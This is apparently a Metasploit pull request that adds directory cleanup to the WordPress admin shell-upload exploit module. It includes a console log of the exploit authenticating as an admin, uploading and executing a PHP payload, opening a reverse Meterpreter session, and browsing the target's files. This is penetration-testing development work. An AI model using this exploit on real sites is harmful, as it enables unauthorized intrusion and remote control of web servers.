### PR TITLE
wp_admin_shell_upload - remove plugin dir after exploitation

### DIFF
--- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
+++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
@@ -96,6 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Executing the payload at #{payload_uri}...")
     register_files_for_cleanup("#{payload_name}.php")
     register_files_for_cleanup("#{plugin_name}.php")
+    register_dir_for_cleanup("../#{plugin_name}")
     send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
   end
 end


### PR DESCRIPTION
This uses the new `register_dir_for_cleanup` method to also cleanup the plugin directory (see #9369).

Can this be a problem with some payloads because the working directory is the removed folder?

```
msf exploit(unix/webapp/wp_admin_shell_upload) > run                                                                                                                         

[-] Handler failed to bind to 172.19.0.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Authenticating with WordPress using admin:password...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/IpegQmFiRG/MGExSAIddV.php...
[*] Sending stage (37543 bytes) to 172.20.0.1
[*] Meterpreter session 2 opened (172.20.0.3:4444 -> 172.20.0.1:36398) at 2018-01-15 14:47:54 +0100
[+] Deleted MGExSAIddV.php
[+] Deleted IpegQmFiRG.php
[+] Deleted ../IpegQmFiRG

meterpreter > pwd                                                                                                                                                            

meterpreter > ls                                                                                                                                                             
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > cd ..                                                                                                                                                          
meterpreter > ls                                                                                                                                                             
Listing: /var/www/html/wp-content/plugins
=========================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40755/rwxr-xr-x   4096  dir   2018-01-15 14:47:10 +0100  AAlcedGrMg
40755/rwxr-xr-x   4096  dir   2018-01-15 14:44:22 +0100  akismet
100644/rw-r--r--  2255  fil   2018-01-15 14:33:44 +0100  hello.php
100644/rw-r--r--  28    fil   2018-01-15 14:33:44 +0100  index.php
```